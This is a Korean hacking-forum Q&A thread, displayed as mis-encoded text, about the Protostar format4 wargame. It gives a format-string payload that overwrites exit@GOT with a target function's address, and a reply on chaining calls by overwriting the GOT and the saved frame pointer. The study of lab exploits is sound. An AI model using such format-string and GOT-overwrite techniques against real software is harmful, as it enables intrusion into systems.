½Ã½ºÅÛ ÇØÅ·

 1574, 6/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   tkakr7458
   format string bug + got overwite

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1864 [º¹»ç]


ÈåÀ¸.. »çÁøÀ» ¸ø¿Ã·Á¼­ ¼³¸íÇϱâ Èûµå³×¿ä ¤Ð¤Ð

https://exploit-exercises.com/protostar/format4/

À§ ÁÖ¼Ò´Â ¼Ò½º À̱¸¿ä

exit ¸¦ hello À¸·Î overwite ÇÒ¶ó°í ÇÕ´Ï´Ù.

hello = 0x080484b4 ÀÌ°í
exit@got = 0x8049718 ÀÔ´Ï´Ù.

format offsetÀº 4 ÀÔ´Ï´Ù. ( "AAAA %x%x%x%x" ÇßÀ»¶§ 4 ¹ø°¿¡ ³ª¿È)

(python -c 'print "\x18\x97\x04\x08"+"134513840%x"+"%4$n")
                                exit@got                helleÁ¤¼ö-4

ÀÌ·±½ÄÀ¸·Î Çϸé overwite°¡ µÇ´Â°ÍÀº ¾Ë°Ú´Âµ¥ ¿¬¼ÓÇؼ­ hello¸¦ È£ÃâÇÏ´Â ¹æ¹ýÀ» ¸ô¸£°Ú½À´Ï´Ù. µµ¿ÍÁֽʼî¤Ð¤Ð
  Hit : 2403     Date : 2017/04/19 08:28


    
ÇØÄð·¯ ÀÌ ¹®Á¦ ÀÚüÀÇ Àǵµ´Â hello¸¦ Çѹø¸¸ È£ÃâÇ϶õ°Çµ¥, hello¿¡ _exitÀÌ À־ ¾îÂ÷ÇÇ hello°£´ÙÀ½¿¡ Á¾·áÇÏ°ÚÁö¸¸ ¸¸¾à¿¡ ¾ø´Â »óȲ¿¡¼­ ¿¬¼ÓÇؼ­ È£ÃâÇÏ´Â ¹æ¹ýÀº ½ºÅÃÀ» µ¤¾î¾ß ÇÕ´Ï´Ù
exitÇÔ¼öÀÇ GOT¸¦ ÀÎÀÚ 1À» ¹Þ¾Æµµ Á¤»óÁøÇàÇÏ´Â ÇÔ¼ö ¿¹¸¦µé¾î execve·Î µ¤°í(execve´Â ÀÎÀÚ°¡ À߸øµÇµµ ÇÁ·Î±×·¥ÀÌ Á¾·áµÇÁö ¾Ê½À´Ï´Ù)
±×´ÙÀ½¿¡ sfpÀÇ Æ÷ÀÎÅ͸¦ ã½À´Ï´Ù, Áï mainÇÔ¼öÀÇ sfp¸¦ vulnÇÔ¼öÀÇ sfp°¡ °¡¸£Å°°í ÀÖÀ¸´Ï vulnÇÔ¼öÀÇ sfp¿¡ %nÀ¸·Î ÁÖ¼Ò¸¦ µ¤¾î¼­ mainÇÔ¼öÀÇ retºÎÅÍ Âß ÆäÀ̷ε带 fsb·Î µ¤À¸¸é fsb·Îµµ call chainingÀ» ÇÒ ¼ö ÀÖ½À´Ï´Ù		 2017/04/20  
ÇØÄð·¯ http://www.hackerschool.org/Sub_Html/HS_Posting/?uid=38 2017/04/20  
tkakr7458 °¨»çÇÕ´Ï´Ù. ¤Ð¤Ð 2017/04/20  
1474   uaf Ãë¾àÁ¡ ,¸Þ¸ð¸® ¸¯ °ü·Ã ¹®Á¦[2]     pkdo1030
 07/15 2447
1473   r0pbabay ¸¦ Ǫ´Âµ¥....[1]     ewqqw
 07/07 1955
1472   ½Ã½ºÅÛ ÇØÅ·°­Á 21°­ºÎÅÍ ÀÚ·á ºÎŹµå·Áµµ µÉ±î¿ä?     sexissports
 06/23 2420
1471   c¾ð¾î ÇÔ¼ö Á¤ÀÇÁß¿¡...     vngkv123
 06/20 2132
1470   checksec, ELF±â´É, ±×¿Ü Áú¹®....     vngkv123
 06/14 2267
1469   pwnable°ú ½ÇÀü ½Ã½ºÅÛ ÇØÅ·ÀÇ Â÷ÀÌ[2]     choboKing
 06/11 4390
1468   ret2kernel32? (À©µµ¿ì ret2libc)[3]     choboKing
 06/11 2160
1467   ulimit -f °ü·ÃÇÏ¿© Áú¹®µå·Áº¾´Ï´ç     vngkv123
 06/01 2077
1466   ½©Äڵ带 ÀÌ¿ëÇؼ­ bof ¸¦ ÇÒ¶§[4]     tkakr7458
 05/22 2584
1465   unlink¸ÅÅ©·Î¿¡¼­ P....[5]     vngkv123
 05/12 2251
1464   heap¿¡¼­ unsafe unlink°¡ Á¶±Ý ÀÌÇØ°¡ ¾ÈµÇ³×¿ë ¤Ð[6]     vngkv123
 05/10 3995
1463   heap¿¡¼­ bin°ü·Ã[3]     vngkv123
 04/30 2404
1462   codegate nuclear¹®Á¦ Áß libc leakÁú¹®..[3]     vngkv123
 04/27 3067
1461   fgetsÇÔ¼ö¸¦ ÀÌ¿ëÇÑ ¹öÆÛ¿À¹öÇ÷ο젠   ewqqw
 04/23 3820
1460   format string ¹öÆÛ¿À¹öÇ÷ο젠   ewqqw
 04/22 2086
1459   angry_doraemon°°Àº ¹®Á¦ ·ÎÄõî·Ï..     vngkv123
 04/22 2477
1458   ¹öÆÛ¿À¹öÇÃ·Î¿ì °ü·Ã[1]     ewqqw
 04/21 2216
1457   ¹öÆÛ ¿À¹öÇÃ·Î¿ì °ü·Ã[2]     ewqqw
 04/20 2153
  format string bug + got overwite[3]     tkakr7458
 04/19 2402
1455   python z3....[2]     vngkv123
 04/19 3062
[1][2][3][4][5] 6 [7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org